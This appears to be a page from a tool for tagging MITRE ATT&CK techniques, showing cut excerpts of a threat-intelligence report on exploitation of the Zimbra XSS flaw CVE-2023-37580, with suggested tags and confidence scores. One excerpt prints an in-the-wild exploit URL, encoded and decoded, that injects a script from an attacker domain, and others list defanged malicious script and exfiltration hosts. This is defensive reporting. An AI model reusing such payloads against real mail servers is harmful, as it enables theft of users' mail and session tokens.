". the exploit was used to steal the zimbra authentication token. the token was exfiltrated to ntcpk [. ] org. conclusion the discovery of at least four campaigns exploiting cve - 2023 - 37580, three campaigns after the bug first became public, demonstrates the importance of organ…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
86%
"##thub on july 5, 2023 and published an initial advisory with remediation guidance on july 13, 2023. they patched the vulnerability as cve - 2023 - 37580 on july 25, 2023. tag observed three threat groups exploiting the vulnerability prior to the release of the official patch, in…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1566.002Spearphishing Link
81%
"https : / / mail. redacted [. ] com / m / momovetost = acg % 22 % 2f % 3e % 3cscript % 20src % 3d % 22https % 3a % 2f % 2fobsorth % 2eopwtjnpoc % 2eml % 2fpqymscxwybwjpios % 2ejs % 22 % 3e % 3c % 2fscript % 3e % 2f % 2f which decodes to : https : / / mail. redacted [. ] com / m /…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
55%
"##cube mail servers just this past month. the regular exploitation of xss vulnerabilities in mail servers also shows a need for further code auditing of these applications, especially for xss vulnerabilities. we ’ d like to acknowledge zimbra for their response and patching of th…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
48%
"zimbra 0 - day used to target international government organizations zimbra 0 - day used to target international government organizations in june 2023, google ’ s threat analysis group ( tag ) discovered an in - the - wild 0 - day exploit targeting zimbra collaboration, an email …"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1190Exploit Public-Facing Application
48%
"the attackers sent emails containing exploit urls to their targets. if a target clicked the link during a logged - in zimbra session, the url loaded the same framework that volexity documented in february 2022. this framework uses the xss to steal users ’ mail data, such as email…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.
No matches for .
Loading techniques…
T1566.002Spearphishing Link
47%
"an apt group known to exploit xss in zimbra and roundcube. the vulnerability was used to load scripts at : https : / / applicationdevsoc [. ] com / zimbramalwaredefender / zimbradefender. js https : / / applicationdevsoc [. ] com / tndgt / auth. js campaign 3 : exploit used for c…"
Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.